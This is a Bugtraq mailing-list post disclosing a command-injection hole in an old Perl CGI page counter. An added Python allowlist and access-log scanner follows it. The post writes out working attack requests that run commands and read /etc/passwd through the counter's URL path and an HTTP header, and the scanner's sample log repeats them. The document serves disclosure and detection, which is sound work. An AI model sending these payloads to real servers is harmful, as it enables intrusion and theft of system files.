Bugtraq mailing list archives
Vulnerability in CGI counter 4.0.7 by George Burgyan
From: hmkash () ARL MIL (Howard M. Kash III)
Date: Mon, 15 May 2000 10:24:47 EDT
I've found no mention of this vulnerability in Bugtraq or in the CVE, nor have I been able to contact the author, so I'm posting here to give everyone the opportunity to protect themselves. This vulnerability is being actively exploited and has been reported to CERT.

The popular CGI web page access counter version 4.0.7 by George Burgyan allows execution of arbitrary commands due to unchecked user input. Commands are executed with the same privilege as the web server. Of course, other exploits can be used to get root access on an unpatched OS.

The counter consists of a perl script called "counter", and multiple links to counter called counter-ord, counterfiglet, counterfiglet-ord, counterbanner, and counterbanner-ord. The following examples illustrate how they can be exploited:

Using straight URL
------------------

http://web-server/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id

Passing commands in a variable
------------------------------

telnet web-server www
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
X: pwd;ls -la /etc;cat /etc/passwd

telnet web-server www
GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0
X: echo;id;uname -a;w

The counter was last updated in 1995, so it is probably no longer supported. Links and email addresses referenced in the source code are no longer valid. However, it appears to still be widely used based on the number of references returned by search engine queries.

Howard Kash
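The post describes the root cause (parameter values taken from the extra-path part of the URL and passed unchecked to a shell or to Perl's eval) and shows what the resulting requests look like. The following Python script is an added example, not part of the original post or of the counter package: it applies a strict allowlist to the name=value segments of counter requests, which is both the check a fixed CGI would perform before using a value and a way to find exploitation attempts in existing web-server access logs. The allowlist pattern, the Common Log Format layout and the sample log lines are constructed assumptions; the real counter's parameter grammar is not on the page.

```python
import re
from urllib.parse import unquote

# Entry points named in the advisory: the script and its hard links.
COUNTER_SCRIPTS = frozenset((
    "counter", "counter-ord", "counterfiglet", "counterfiglet-ord",
    "counterbanner", "counterbanner-ord",
))

# Allowlist for a font / language / file-name style parameter value.
# ASSUMPTION: the counter's real parameter grammar is not on the page; this is
# the kind of strict check a fixed CGI must apply before a value reaches a
# shell command or eval(). Everything the advisory's examples rely on
# (';', '(', ')', '"', '$', spaces) is rejected by construction.
SAFE_VALUE_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")

# Common Log Format request line (assumed log layout), e.g.
# 10.0.0.1 - - [15/May/2000:10:24:47 -0400] "GET /cgi-bin/x HTTP/1.0" 200 123
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>\S+)" (?P<status>\d{3}) \S+'
)


def is_safe_value(value: str) -> bool:
    """Allowlist check: only letters, digits, '_', '.' and '-' pass."""
    return SAFE_VALUE_RE.fullmatch(value) is not None


def counter_params(uri: str):
    """Return (script, {name: value}) for a counter request, or None.

    Parameters are the extra-path segments of the form name=value after the
    script name, matching the shape of the URLs quoted in the advisory.
    Segments without '=' (e.g. 'nc', 'nl', 'ord') are ignored. Each segment
    is percent-decoded first so encoded metacharacters are seen as well."""
    path = uri.split("?", 1)[0]
    segments = [unquote(s) for s in path.split("/") if s]
    for i, seg in enumerate(segments):
        if seg in COUNTER_SCRIPTS:
            params = {}
            for tail in segments[i + 1:]:
                name, sep, value = tail.partition("=")
                if sep:
                    params[name] = value
            return seg, params
    return None


def suspicious_params(uri: str) -> dict:
    """Return the counter parameters in `uri` that fail the allowlist ({} if none)."""
    parsed = counter_params(uri)
    if parsed is None:
        return {}
    _, params = parsed
    return {k: v for k, v in params.items() if not is_safe_value(v)}


def scan_log(lines):
    """Return [(host, uri, bad_params)] for counter requests carrying unsafe values."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        bad = suspicious_params(m.group("uri"))
        if bad:
            hits.append((m.group("host"), m.group("uri"), bad))
    return hits


# Constructed sample log lines: two reproduce the URLs quoted in the advisory,
# one uses a percent-encoded ';', and two are benign (a normal counter hit and
# a non-counter request that happens to contain a ';').
SAMPLE_LOG = [
    '10.0.0.1 - - [15/May/2000:10:24:47 -0400] "GET /cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id HTTP/1.0" 200 512',
    '10.0.0.2 - - [15/May/2000:10:25:01 -0400] "GET /cgi-bin/counter/nl/ord/lang=english(1);system(\\"$ENV{HTTP_X}\\"); HTTP/1.0" 200 64',
    '10.0.0.3 - - [15/May/2000:10:26:13 -0400] "GET /cgi-bin/counterbanner/nc/f=%3Bid HTTP/1.0" 200 64',
    '10.0.0.4 - - [15/May/2000:10:27:30 -0400] "GET /cgi-bin/counter/nl/ord/lang=english HTTP/1.0" 200 64',
    '10.0.0.5 - - [15/May/2000:10:28:00 -0400] "GET /index.html;id HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for host, uri, bad in scan_log(SAMPLE_LOG):
        print(f"{host} {uri} -> unsafe parameters {bad}")
```

The same `is_safe_value` allowlist serves both purposes: applied inside the CGI before a value is interpolated into a command or eval'd, it closes the injection; applied to logged URIs, it surfaces every request in which someone supplied something other than a plain font, language or file name. Decoding each path segment before checking matters, since `%3B` and `;` reach the script as the same byte.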